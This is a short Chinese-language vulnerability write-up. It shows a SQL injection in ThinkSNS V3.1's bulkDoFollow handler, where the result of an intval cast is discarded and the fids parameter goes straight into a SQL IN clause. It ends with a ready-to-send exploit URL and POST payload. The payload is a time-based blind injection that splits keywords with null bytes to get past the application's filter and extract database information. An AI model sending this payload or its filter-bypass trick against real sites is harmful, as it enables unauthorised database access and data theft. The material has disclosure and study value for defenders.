ThinkSNS 防御绕过思路(union select 真正的无限制sql注射)
public function bulkDoFollow() {
// 安全过滤
$res = $this->_follow_model->bulkDoFollow($this->mid, t($_POST[‘fids‘]));
$this->ajaxReturn($res, $this->_follow_model->getError(), false !== $res);
}
跟进bulkDoFollow
public function bulkDoFollow($uid, $fids) {
$follow_states = $this->getFollowStateByFids($uid, $fids);
跟进:getFollowStateByFids
public function getFollowStateByFids($uid, $fids) {
array_map( ‘intval‘ , $fids);
$_fids = is_array($fids) ? implode(‘,‘, $fids) : $fids;
if(empty($_fids)) {
return array();
}
$follow_data = $this->where(" ( uid = ‘{$uid}‘ AND fid IN({$_fids}) ) OR ( uid IN({$_fids}) and fid = ‘{$uid}‘)")->findAll();
$follow_states = $this->_formatFollowState($uid, $fids, $follow_data);
看着一段逻辑
array_map( ‘intval‘ , $fids);
$_fids = is_array($fids) ? implode(‘,‘, $fids) : $fids;
fids如果是一个字符串
array_map( ‘intval‘ , "1,2,3"); 这个是会报警告的,但是程序还是会往下执行
所以造成注入
发送url:
http://localhost/ThinkSNS_V3.1_20131108_28822/index.php?app=public&mod=Follow&act=bulkDoFollow
postdata:
fids=1,2,if(ascii(substr((sele%00ct user() fr%00om ts_atme limit 0,1),slee%00p(3),1))=114,5,1)))#
造成全站信息可以猜测